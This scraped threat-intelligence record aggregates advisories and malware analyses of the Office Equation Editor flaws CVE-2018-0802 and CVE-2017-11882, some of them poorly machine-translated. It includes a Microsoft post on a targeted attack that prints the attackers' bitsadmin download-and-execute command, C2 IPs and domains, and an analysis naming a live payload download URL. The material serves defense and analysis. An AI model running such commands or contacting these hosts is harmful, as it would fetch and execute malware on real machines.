true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-40444", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105", "CVE-2022-22022", "CVE-2022-22026", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2624", "CVE-2022-30190", "CVE-2022-30206", "CVE-2022-30220", "CVE-2022-30226", "CVE-2022-3075", "CVE-2022-33636", "CVE-2022-33649", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-34718", "CVE-2022-34724", "CVE-2022-35743", "CVE-2022-35750", "CVE-2022-35796", "CVE-2022-35803", "CVE-2022-37969", "CVE-2022-38012", "CVE-2022-38476", "CVE-2022-38477", "CVE-2022-38478", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-18T08:10:34", "id": "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "href": "https://securelist.com/it-threat-evolution-in-q3-2022-non-mobile-statistics/107963/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-05-27T14:48:29", "description": "A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office or Microsoft WordPad software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) containing a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.\n\nThe security update addresses the vulnerability by removing Equation Editor functionality. For more information on this change, please refer to the following article: <https://support.microsoft.com/en-us/help/4057882>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-09T08:00:00", "type": "mscve", "title": "Microsoft Office Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802"], "modified": "2018-01-12T08:00:00", "id": "MS:CVE-2018-0802", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2018-0802", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2018-12-03T23:45:41", "description": "Several weeks ago, the Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>)) team uncovered a new cyberattack that targeted several high-profile organizations in the energy and food and beverage sectors in Asia. Given the target region and verticals, the attack chain, and the toolsets used, we believe the threat actor that the industry refers to as Tropic Trooper was likely behind the attack.\n\nThe attack set off numerous Windows Defender ATP alerts and triggered the device risk calculation mechanism, which labeled the affected machines with the highest risk. The high device risk score put the affected machines at the top of the list in Windows Defender Security Center, which led to the early detection and discovery of the attack.\n\nWith the high risk determined for affected machines, [Conditional access](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-atp/conditional-access-windows-defender-advanced-threat-protection>) blocked these machines access to sensitive content, protecting other users, devices, and data in the network. IT admins can control access with Conditional access based on the device risk score to ensure that only secure devices have access to enterprise resources.\n\nFinally, automatic investigation and remediation kicked in, discovered the artifacts on affected machines that were related to the breach, and remediated the threat. This sequence of actions ensured that the attackers no longer had foothold on affected machines, returning machines to normal working state. Once the threat was remediated, the risk score for those machines was reduced and Conditional access restrictions were lifted.\n\n## Investigating alert timelines and process trees\n\nWe discovered the attack when Windows Defender ATP called our attention to alerts flagging several different suspicious activities like abnormal Office applications activity, dubious cross-process injections, and machine-learning-based indications of anomalous executions flows. The sheer volume and variety of the alerts told us something serious was going on.\n\n![](https://cloudblogs.microsoft.com/uploads/prod/sites/13/2018/11/fig1-tropic-trooper-alerts.png)\n\n_Figure 1. Multiple alerts triggered by the attack_\n\nThe first detection related to the attack was fired by a suspicious _EQNEDT32.exe_ behavior, which led us to the entry vector of the attack: a malicious document that carried an exploit for CVE-2018-0802, a vulnerability in Microsoft Office Equation Editor, which the actor known as Tropic Trooper has exploited in previous campaigns. Using [Office 365 ATP](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>) Threat Explorer, we found the specific emails that the attackers used to distribute the malicious document.\n\nUsing Windows Defender Security Center, we further investigated the detected executable and found that the attackers used _bitsadmin.exe_ to download and execute a randomly named payload from a remote server:\n \n \n bitsadmin /transfer Cd /priority foreground http:/<IP address>:4560/.exe %USERPROFILE%\\fY.exe && start %USERPROFILE%\\fY.exe\n\nMachine timeline activity showed that the executed payload communicated to a remote command-and-control (C&C) server and used the [process hollowing](<https://cloudblogs.microsoft.com/microsoftsecure/2017/07/12/detecting-stealthier-cross-process-injection-techniques-with-windows-defender-atp-process-hollowing-and-atom-bombing/>) technique to run code in a system process memory.\n\nIn some cases, the attacker ran additional activities using malicious PowerShell scripts. Windows Defender ATPs [Antimalware Scan Interface (AMSI)](<https://docs.microsoft.com/en-us/windows/desktop/amsi/antimalware-scan-interface-portal>) sensor exposed all the attacker scripts, which we observed to be meant mostly for data exfiltration.\n\n![](https://cloudblogs.microsoft.com/uploads/prod/sites/13/2018/11/fig2-tropic-trooper-process-tree-2.png)\n\n_Figure 2. Process tree_\n\nUsing the timeline and process tree views in Windows Defender Security Center, were able to identity the processes exhibiting malicious activities and pinpoint exactly when they occurred, allowing us to reconstruct the attack chain. As a result of this analysis, we were able to determine a strong similarity between this new attack and the attack patterns used by the threat actor known as Tropic Trooper.\n\n![](https://cloudblogs.microsoft.com/uploads/prod/sites/13/2018/11/tropic-trooper-attack-chain.png)\n\n_Figure 3. Campaign attack chain_\n\n## Device risk calculation and incident prioritization\n\nThe alerts that were raised for this attack resulted in a high device risk score for affected machines. Windows Defender ATP determines a device risk score based on different mechanisms. The score is meant to raise the risk level of machines with true positive alerts that indicate a potential targeted attack. The high device risk score pushed the affected machines to the top of the queue, helping ensure security operations teams can immediately notice and prioritize. More importantly, elevated device risk scores trigger automatic investigation and response, helping contain attacks early in its lifespan.\n\nIn this specific attack, the risk calculation mechanism gave the affected machines the highest risk based on cumulative risk. Cumulative risk is calculated based on the multiple component and multiple types of anomalous behaviors exhibited by an attack across the infection chain.\n\n## Windows Defender ATP-driven conditional access\n\nWhen Windows Defender ATP raises the device risk score for machines, as in this attack, the affected devices are marked as being at high risk. This risk score is immediately communicated to Conditional access, resulting in the restriction of access from these devices to corporate services and data managed by [Azure Active Directory](<https://azure.microsoft.com/en-us/services/active-directory/>).\n\nThis integration between Windows Defender ATP and Azure Active Directory through Microsoft Intune ensures that attackers are immediately prevented from gaining access to sensitive corporate data, even if attackers manage to establish a foothold on networks. When the threat is remediated, Windows Defender ATP drops the device risk score, and the device regains access to resources. **[Read more about Conditional access here](<https://techcommunity.microsoft.com/t5/What-s-New/Conditional-access-Ensuring-that-only-secure-users-and-devices/ba-p/292510>)**.\n\n## Signal sharing and threat remediation across Microsoft Threat Protection\n\nThreat signal sharing across Microsoft services through the [Intelligent Security Graph](<https://cloudblogs.microsoft.com/microsoftsecure/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) ensures that threat remediation is orchestrated across [Microsoft Threat Protection](<https://techcommunity.microsoft.com/t5/Security-Privacy-and-Compliance/Announcing-Microsoft-Threat-Protection/ba-p/262783>). In this case, Office 365 ATP blocked the related email and malicious document used in the initial stages of the attack. Office 365 ATP had determined the malicious nature of the emails and attachment at the onset, stopping the attacks entry point and protecting Office 365 ATP customers from the attack.\n\nThis threat signal is shared with Windows Defender ATP, adding to the rich threat intelligence that was used for investigation. Likewise, Office 365 ATP consumes intelligence from Windows Defender ATP, helping make sure that malicious attachments are detected and related emails are blocked.\n\nMeanwhile, as mentioned, the integration of Windows Defender ATP and Azure Active Directory ensured that affected devices are not allowed to access sensitive corporate data until the threat is resolved. \nWindows Defender ATP, Office 365 ATP, and Azure Active Directory are just someof the many Microsoft services now integrate through Microsoft Threat Protection, an integrated solution for securing identities, endpoints, user data, cloud apps, and infrastructure.\n\n## Conclusion\n\nThe new device risk calculation mechanism in [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) raised the priority of various alerts that turned out to be related to a targeted attack, exposing the threat and allowing security operations teams to immediately take remediation actions. Additionally, the elevated device risk score triggered automated investigation and response, mitigating the attack at its early stages.\n\nThrough [Conditional access](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-atp/conditional-access-windows-defender-advanced-threat-protection>), compromised machines are blocked from accessing critical corporate assets. This protects organizations from the serious risk of attackers leveraging compromised devices to perform cyberespionage and other types of attacks.\n\nTo test how these and other advanced capabilities in Windows Defender ATP can help your organization detect, investigate, and respond to attacks, [**sign up for a free trial**](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>).\n\n \n\n \n\n_**Hadar Feldman** and **Yarden Albeck**_ \n_Windows Defender ATP team_\n\n \n\n \n\n## Indicators of attack (IoCs)\n\n### Command and control IP addresses and URLs:\n\n * 199[.]192[.]23[.]231\n * 45[.]122[.]138 [.]6\n * lovehaytyuio09[.]com\n\n### Files (SHA-256):\n\n * 9adfc863501b4c502fdac0d97e654541c7355316f1d1663b26a9aaa5b5e722d6 (size: 190696 bytes, type: PE)\n * 5589544be7f826df87f69a84abf478474b6eef79b48b914545136290fee840fe (size: 727552, type: PE)\n * 073884caf7df8dafc225567f9065bbf9bf8e5beef923655d45fe5b63c6b6018c (size: 195123 bytes, type: docx)\n * 1aef46dcbf9f0b5ff548f492685d488c7ac514a24e63a4d3ed119bfdbd39c908 (size: 207444, type: docx)\n\n \n\n \n\n \n\n[![](https://cloudblogs.microsoft.com/uploads/prod/2018/04/windows-defender-atp-8.png)](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>)\n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>) and [Windows Defender Security Intelligence](<https://www.microsoft.com/en-us/wdsi>).\n\nFollow us on Twitter [@WDSecurity](<https://twitter.com/WDSecurity>) and Facebook [Windows Defender Security Intelligence](<https://www.facebook.com/MsftWDSI/>).\n\n \n\nThe post [Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks](<https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/>) appeared first on [Microsoft Secure](<https://cloudblogs.microsoft.com/microsoftsecure>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-28T21:46:48", "type": "mssecure", "title": "Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802"], "modified": "2018-11-28T21:46:48", "id": "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2021-06-08T19:04:40", "description": "### Description\n\nMicrosoft Office is prone to a memory-corruption vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Office 2007 SP3 \n * Microsoft Office 2010 Service Pack 2 (32-bit editions) \n * Microsoft Office 2010 Service Pack 2 (64-bit editions) \n * Microsoft Office 2013 Service Pack 1 (32-bit editions) \n * Microsoft Office 2013 Service Pack 1 (64-bit editions) \n * Microsoft Office 2016 (32-bit edition) \n * Microsoft Office 2016 (64-bit edition) \n * Microsoft Office 2016 Click-to-Run (C2R) for 32-bit edition \n * Microsoft Office 2016 Click-to-Run (C2R) for 64-bit edition \n * Microsoft Office Compatibility Pack Service Pack 3 \n * Microsoft Word 2007 SP3 \n * Microsoft Word 2010 Service Pack 2 (32-bit editions) \n * Microsoft Word 2010 Service Pack 2 (64-bit editions) \n * Microsoft Word 2013 RT Service Pack 1 \n * Microsoft Word 2013 Service Pack 1 (32-bit editions) \n * Microsoft Word 2013 Service Pack 1 (64-bit editions) \n * Microsoft Word 2016 (32-bit edition) \n * Microsoft Word 2016 (64-bit edition) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2018-01-09T00:00:00", "type": "symantec", "title": "Microsoft Office CVE-2018-0802 Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2018-0802"], "modified": "2018-01-09T00:00:00", "id": "SMNTC-102347", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102347", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2018-12-02T18:49:48", "description": "Recently harvested a suffix called doc word document, view the After is actually a rich text format document. In a test environment to open after the discovery of a network connection and executing a program of action, determine the sample is malware document. After a preliminary analysis, found that the sample is CVE-2017-11882 vulnerabilities using a new sample. CVE-2017-11882 vulnerability and CVE-2018-0802 vulnerability based on Office equation editor processing logic, is the nearest office of malicious attacks document by conventional means. On the network for the vulnerability of the Genesis, the use of analysis of already in place, such as 360 days eye laboratory using the Office Equation Editor special processing logic of the newest[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)technical analysis of CVE-2017-11882, as well as Tencent computer housekeeper NDAY vulnerability CVE-2017-11882 and 0Day vulnerability CVE-2018-0802 vulnerability combination of the dissemination of remote control Trojans of the sample analysis and other technical reports. The samples and before each analysis are slightly different, should be CVE-2017-11882 vulnerability and a variant version. \nFirst, the basic operation of the \nExperimental environment: windows 7 x64 sp1, Chinese edition, office 2010 Chinese version. \nThe vulnerability of the sample after opening, the display content of the document is garbled, as shown below. \n! [](https://image.3001.net/images/20181124/1543024815_5bf8b0aff1ceb.png! small) \nIn addition, in the%temp%directory to build and run a named emre. exe executable files. Capture found emre. exe from http://ghthf. cf/cert/ochicha. exe download generated. As shown below. \n! [](https://image.3001.net/images/20181124/1543025083_5bf8b1bb3a590.png! small) \nSecond, the vulnerability to debug \n1, the sample form \nwinhex opens the following two figures shown. The document directly behind the heel to display the content. \n! [](https://image.3001.net/images/20181124/1543025978_5bf8b53ac1bc7.png! small) \nFollowed by that object, as shown below. \n! [](https://image.3001.net/images/20181124/1543025728_5bf8b44012bda.png! small) \n2, RTF, a preliminary analysis of the \nWith rftobj after the analysis of the results is shown below. You can see the clsid for 0002ce02-0000-0000-c000-000000000046 i.e. Microsoft Equation Editor object. \n! [](https://image.3001.net/images/20181124/1543026347_5bf8b6ab810d7.png! small) \n! [](https://image.3001.net/images/20181124/1543026881_5bf8b8c10fb6b.png! small) \nFrom the figure we can see that the object name is\u201ceQuatiON native\u201d, the normal name of the object\u201cEquation Native\u201dfor the case conversion operations, may also be the pursuit of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)one of the effects. \n3, vulnerability debugging \nAccording to various aspects of the vulnerability analysis report, we direct commissioning a vulnerability where a function 0041160F it. \n! [](https://image.3001.net/images/20181124/1543027328_5bf8ba80a5a02.png! small) \nAfter the 11th rep after the operation, as in the following figure, the stack 0x0043F775 be covered. \n! [](https://image.3001.net/images/20181124/1543027588_5bf8bb8428e33.png! small) \n! [](https://image.3001.net/images/20181124/1543027800_5bf8bc58c5a27.png! small) \nAnd EQNEDT32. EXE process 0x0043F775 the value of is C3, happens to be the instruction retn\u3002 \n! [](https://image.3001.net/images/20181124/1543028035_5bf8bd439c8e9.png! small) \nAfter the execution jumps to the shellcode location. As shown below: \n! [](https://image.3001.net/images/20181124/1543028175_5bf8bdcf72dd2.png! small) \n4, the shellcode debugging analysis \nshellcode location in the eQuatiON-native object. \nDivided into two parts, wherein the start location 0\u00d70826, B9 C439E66A shown on figure 0018F354 at the disassembly instructions start to 0851, followed by four bytes 0x0043F7F5\uff08EQNEDT32. EXE process in the RETN instruction is. The second portion of the position in the 0x089E at the beginning to the end. \n! [](https://image.3001.net/images/20181124/1543028371_5bf8be938ff06.png! small) \nThe first part of the shellcode to jump to the second part of the compilation command as shown below: \n! [](https://image.3001.net/images/20181124/1543029212_5bf8c1dc1ce30.png! small) \nAfter analysis, found that the segment of shellcode, a series of jmp jump instruction operation, due to shellcode obfuscation and protection. For example, the following figure shows: \n! [](https://image.3001.net/images/20181124/1543029376_5bf8c280e0d65.png! small)\n\n**[1] [[2]](<92253_2.htm>) [next](<92253_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-12-02T00:00:00", "type": "myhack58", "title": "A CVE-2017-11882 vulnerability is a new variation of a sample of the debugging and analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2018-12-02T00:00:00", "id": "MYHACK58:62201892253", "href": "http://www.myhack58.com/Article/html/3/62/2018/92253.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-25T17:29:45", "description": "! [](/Article/UploadPic/2018-12/20181225205545726. png) \nRecently intercepted an extension doc word document to attack the samples, which format is actually RTF format. By analyzing the document composition the use of a cve-2017-11882 and cve-2018-0802 vulnerability, and use the embedded excel object is used to trigger the vulnerability. The release of the PE file is used to collect the target user's sensitive information. \n\nFirst, the basic situation \nIn the experimental environment win764, the Office 2010 open the document, process monitoring, found that the winword process is executed after the \u9996\u5148\u6267\u884cexcel.exe that \u7136\u540e\u8fd0\u884cEQNEDT32.exe that \u63a5\u7740\u8fd0\u884ccmd.exe finally run A process. X, in which EQNEDT32. exe running twice. \u770b\u5230EQNEDT32.exe bottle feel should be cve-2017-11882 or cve-2018-0802 samples. \nThe document is opened, display as a empty document, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545737. png) \nOn the figure, inadvertently probably thought it was empty, in fact, a closer look, found the top left a small black point icon. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545312. png) \nDouble-click the Find pop-up window, as shown below. Display the\u201cwindows cannot open this file: A. X\u201d. Obviously, the\u201csmall black dot\u201dshould be an external object. \n! [](/Article/UploadPic/2018-12/20181225205545780. png) \nRight-click the object, select\u201cpackager shell object\u201dobject, you can view the object's\u201cproperties\u201d. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545220. png) \nIts object properties as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545229. png) \nSee here, we it can be concluded that: the sample should be is to use the RTF is embedded in a PE object in the open document when the default release to the%temp%directory, then use cve-2017-11882 or cve-2018-0802 execution of the process. \n\nSecond, the RTF analysis \n1, the document structure analysis \n! [](/Article/UploadPic/2018-12/20181225205545186. png) \nUse rtfobj attack on the document analysis, finding its embedded two objects, respectively, is a package object and an Excel. Sheet. 8 object. As shown in Fig. Package object the original file is\u201cC:\\\\\\Users\\\\\\n3o\\\\\\AppData\\\\\\Local\\\\\\Microsoft\\\\\\Windows\\\\\\INetCache\\\\\\Content.Word\\\\\\A.X\u201dit. From this it can be seen, the author of the document[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)user name: n3o on. \nWherein A. X is the release of the malicious PE file. \nThe other one is an embedded excel table object, we put the extract of the excel table the suffix renamed. xls after excel is opened. Find it contains two objects AAAA and bbbb are\u201cEquation. 3\u201dthe object, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545928. png) \nTo extract the excel table object, which is the document structure as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545742. png) \nThe table includes two CLSID for\u201c0002ce02-0000-0000-c000-000000000046\u201dMicrosoft Equation 3.0 object MBD0002E630 and MBD0002E631, you can see the modification time for the 2018/5/21 17:of 52. \n! [](/Article/UploadPic/2018-12/20181225205545793. png) \nIn addition, two\u201cMicrosoft Equation 3.0\u201dobject. Ole10Native size of 59 bytes and 160 bytes, which contains a\u201ccmd.exe /c %tmp%\\A. X\u201dused to perform A. The X process. Should be used in combination for cve-2017-11882 and cve-2018-0802 two vulnerabilities. \nThus, we can fundamental analysis clear the sample, the overall flow diagram as the following figure shown. \n! [](/Article/UploadPic/2018-12/20181225205545654. png) \n2, the static document \nUse winhex to open, you can find the first package object in File 0x2A8A. Wherein 0x00137158 refers to the size of the object, that is, the decimal 1274200, it is the release of A. X size. Followed by IS PE file in winhex we can see that the author put the PE head 0x4D5A has been modified, inserted in the middle 0x090d is divided, so that it becomes[0x090d]4[0x090d]d[0x090d]5[0x090d]a[0x090d], in fact, is 0x4d5a, such an operation should be in order to avoid certain anti-virus of Avira, not directly to 0x4d5a9000 the look of the rendering, a look that is clearly of the PE file. Specific as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545840. png) \nAnother object in 0x299061 position, is an Exce. Sheet. 8 object. Its size is 0x00005C00, that is, the decimal 23552, and rtfobj extracted exel size consistent. The author of the compound document header has changed, with 0x0909 is divided, so that d0cf11 at the beginning of the composite document into the d[0x0909]0[0x0909]\u3002 Should also be a certain sense of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)\n\n**[1] [[2]](<92510_2.htm>) [[3]](<92510_3.htm>) [next](<92510_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-12-25T00:00:00", "type": "myhack58", "title": "A use cve-2017-11882 and cve-2018-0802 combination of vulnerability a malicious document analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2018-12-25T00:00:00", "id": "MYHACK58:62201892510", "href": "http://www.myhack58.com/Article/html/3/62/2018/92510.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-13T15:28:22", "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities 